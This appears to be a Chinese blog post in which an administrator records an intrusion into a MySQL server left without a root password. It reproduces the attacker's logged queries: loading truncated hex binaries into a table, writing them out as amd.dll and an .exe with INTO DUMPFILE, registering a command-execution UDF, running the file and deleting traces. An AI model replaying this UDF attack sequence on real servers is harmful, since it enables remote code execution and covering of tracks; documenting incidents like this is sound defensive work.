`
optilixue
  • 浏览: 26240 次
  • 性别: Icon_minigender_1
  • 来自: 广州
社区版块
存档分类
最新评论

mysql设置问题导致的攻击记录

 
阅读更多
主要是当时安装mysql的时候没有设置root密码,实际上已经设置了root用户只能localhost登录,但是不知道这个入侵者是如何远程root登录的~~~
入侵者的ip:220.189.225.30 是个美国的ip
分析:

先创建一个临时表, create table if not exists tempMix4(data LONGBLOB);

然后插入一堆代码,估计是文件的16进制编码,

110624 12:50:28      49679 Query       set @a = concat('',0x4D5A90000300000004000000FFFF0000B80000000000000040...此处省去很多很多...0000000000000000000000)
110624 12:50:38      49679 Query       INSERT INTO tempMix4 VALUES (@a)

然后执行了以下的语句,从而在windows下会在

     49679 Query       select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE '..\\bin\\amd.dll'

这些文件夹生成了一个amd.dll文件,

然后执行以下操作:估计是执行这些文件,文件具体干嘛的不知道~~

   110624 12:50:44      49679 Query       create function cmdshelv returns string soname 'amd.dll'
          49679 Query       create function cmdshelv returns string soname 'amd.dll'
          49679 Query       create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
110624 12:50:45      49679 Query       create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
          49679 Query       create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
          49679 Query       create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
          49679 Query       create function cmdshelv returns string soname 'amd.dll'
110624 12:50:46      49679 Query       select cmdshelv('c:\\33061.exe')
          49679 Query       select cmdshelv('c:\\33061.exe')
110624 12:50:47      49679 Query       select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:48      49679 Query       select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:49      49679 Query       select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
          49679 Query       select cmdshelv('cmd.exe cmd/c del c:\amd.dll')
          49679 Query       select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')
          49679 Query       select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')

--------------------------------------------------------------------------------详细入侵过程如下-------------------------------------------------

110624 12:50:19      49679 Connect     root@220.189.225.30 on
          49679 Query       drop function cmdshell
110624 12:50:20      49679 Query       drop function my_udfdoor
          49679 Query       drop function do_system
          49679 Query       use mysql
110624 12:50:21      49679 Query       drop table if exists tempMix4
          49679 Query       create table if not exists tempMix4(data LONGBLOB)
110624 12:50:28      49679 Query       set @a = concat('',0x4D5A90000300000004000000FFFF0000B80000000000000040...此处省去很多很多...0000000000000000000000)
110624 12:50:38      49679 Query       INSERT INTO tempMix4 VALUES (@a)
          49679 Query       select data from tempMix4 into DUMPFILE 'C:\\33061.exe'
110624 12:50:39      49679 Query       drop table if exists tempMix4
          49679 Query       use mysql
          49679 Query       drop table if exists tempMix
110624 12:50:40      49679 Query       create table if not exists tempMix(data LONGBLOB)
110624 12:50:42      49679 Query       set @a = concat('',0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000...此处省去很多很多...00000000000000000)
110624 12:50:43      49679 Query       INSERT INTO tempMix VALUES (@a)
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE 'C:\\amd.dll'
          49679 Query       select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
110624 12:50:44      49679 Query       create function cmdshelv returns string soname 'amd.dll'
          49679 Query       create function cmdshelv returns string soname 'amd.dll'
          49679 Query       create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
110624 12:50:45      49679 Query       create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
          49679 Query       create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
          49679 Query       create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
          49679 Query       create function cmdshelv returns string soname 'amd.dll'
110624 12:50:46      49679 Query       select cmdshelv('c:\\33061.exe')
          49679 Query       select cmdshelv('c:\\33061.exe')
110624 12:50:47      49679 Query       select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:48      49679 Query       select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:49      49679 Query       select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
          49679 Query       select cmdshelv('cmd.exe cmd/c del c:\amd.dll')
          49679 Query       select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')
          49679 Query       select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')
          49679 Query       drop table if exists tempMix
          49679 Quit      
分享到:
评论

相关推荐

    基于MySQL的SQL注入攻击

    SQL注入攻击之所以能够成功,主要是因为Web应用开发者在编写代码时未能对用户输入的数据进行充分的过滤和验证,尤其是在构造SQL语句时直接将未经检查的用户输入作为参数,导致攻击者有机会注入恶意SQL代码。...

    MySQL安全问题探讨.pdf

    2. **避免以root权限运行MySQL**:安装完成后,数据库目录归属应设置为“mysql”用户,而软件目录归属为“root”。这样可以防止具有FILE权限的用户以root身份创建文件,降低安全风险。 3. **防止DNS欺骗**:创建...

    mysql 加固策略

    为了防止过多的并发连接导致资源耗尽,可以在`my.cnf`中设置`max_user_connections`参数来限制每个用户的最大连接数。 ```ini [mysqld] max_user_connections = 20 ``` #### 8. 用户目录权限限制 确保MySQL的数据...

    MySQL常见问题集锦详解-完整版.pdf

    如果mysqld出现问题,错误日志通常会记录在`mysql-data-directory/hostname.err`文件中,这有助于定位问题原因。 2. **MySQL Server Has Gone Away**: 这个错误通常是由于服务器超时关闭连接导致。默认情况下,...

    mysql自动实现备份脚本

    - 数据安全:定期备份能防止因硬件故障、软件错误或恶意攻击导致的数据丢失。 - 恢复速度:如果出现问题,可以快速恢复到某个时间点的状态,减少业务中断时间。 - 符合法规:某些行业法规要求企业必须保持数据的...

    mysql-connector-c-6.1.11-winx64

    5. **错误处理和调试支持**:提供详细的错误信息和日志记录功能,有助于开发者诊断和解决连接问题。 6. **多语种支持**:MySQL Connector/C支持多语言环境,能够处理各种字符集,满足全球化应用的需求。 7. **线程...

    MySQL工作的jar包

    6. 日志记录:记录数据库操作的日志,有助于调试和排查问题。 总的来说,"mysql-connector-java-5.1.7-bin.jar"作为Java连接MySQL数据库的核心工具,其正确使用和版本匹配是成功进行数据库操作的基础。同时,还需要...

    mysql数据库还原.7z

    然而,数据丢失的情况时有发生,可能是由于用户误操作、系统故障、硬件问题或者恶意攻击导致的。在这种情况下,数据库的备份与恢复机制显得尤为重要。 在MySQL中,数据库备份通常通过以下几种方式实现: 1. **...

    教你有效防止MySQL数据库被解密

    - 对所有MySQL用户设置口令,避免无口令登录,这是最基本的安全保障。 - 定期更改密码,尤其是对于root用户,以增强安全性。 - 避免使用易猜或通用的密码,应采用复杂、随机的字符组合。 2. **运行权限**: - ...

    mysql封装.zip

    这可能涉及锁的使用,以防止并发访问导致的问题。 8. **预编译语句**:为了提高性能和安全性,封装可能支持预编译SQL语句,减少解析成本并防止SQL注入攻击。 9. **事务处理**:如果封装支持事务,那么会包含开始...

    MySQL-进阶.pdf

    - **索引优化**:合理使用索引,避免过度使用导致的性能下降。 - **参数调整**:根据系统负载调整MySQL配置参数,如缓冲区大小等。 - **硬件优化**:升级硬件设备,如增加内存或使用更快的磁盘等。 #### 四、安全...

    mysql数据备份脚本

    如果这些数据因硬件故障、软件错误、恶意攻击或人为误操作而丢失,可能会对公司的运营造成严重影响,甚至导致重大经济损失。因此,定期备份数据是确保业务连续性的关键策略。 在 Windows 环境下,我们可以利用...

    JSP+MySql分页组件

    分页技术可以有效地解决这个问题,只加载用户当前需要查看的数据。 **JSP(JavaServer Pages)** 是一种动态网页技术,它允许开发者在HTML或XML文档中嵌入Java代码,从而实现服务器端的业务逻辑处理。JSP通过...

    MySQL Backup 3.2.6.3432

    在数据库管理中,定期备份是至关重要的,因为任何未预期的硬件故障、软件错误或恶意攻击都可能导致数据丢失。这款工具提供了高效且可靠的解决方案来应对这些潜在风险。 MySQL Backup 3.2.6.3432 版本可能包含以下...

    mysqludf库

    由于它可以执行任意系统命令,如果权限设置不当,可能会导致安全漏洞,让攻击者有机会执行恶意命令。因此,在生产环境中谨慎使用,并确保遵循最佳实践来限制访问和审计日志记录。 总的来说,`mysqludf库`是MySQL...

    MyQQ.rar_MySQL 服务器_mysql qq_mysql聊天_服务器mysql

    在这个项目中,MySQL作为服务器端的数据存储和处理中心,负责保存用户的聊天记录、好友关系等核心信息。 VC++,全称Visual C++,是微软公司推出的一种面向对象的C++编程环境,它提供了丰富的库支持和强大的开发工具...

    MYSQL注入获取权限

    例如,一个正常的查询可能为"SELECT * FROM users WHERE username = 'admin'",而攻击者输入' OR 1=1 -- ',则查询变为"SELECT * FROM users WHERE username = '' OR 1=1 -- '",这将返回所有用户的记录。...

    mysql与excel互导

    在日常工作中,我们经常需要在MySQL数据库和Excel之间进行数据交互,例如导出数据库数据以便于分析,或者将整理好的Excel数据导入到数据库中更新或新增记录。本文将详细介绍如何实现这一过程。 ### MySQL数据导出至...

Global site tag (gtag.js) - Google Analytics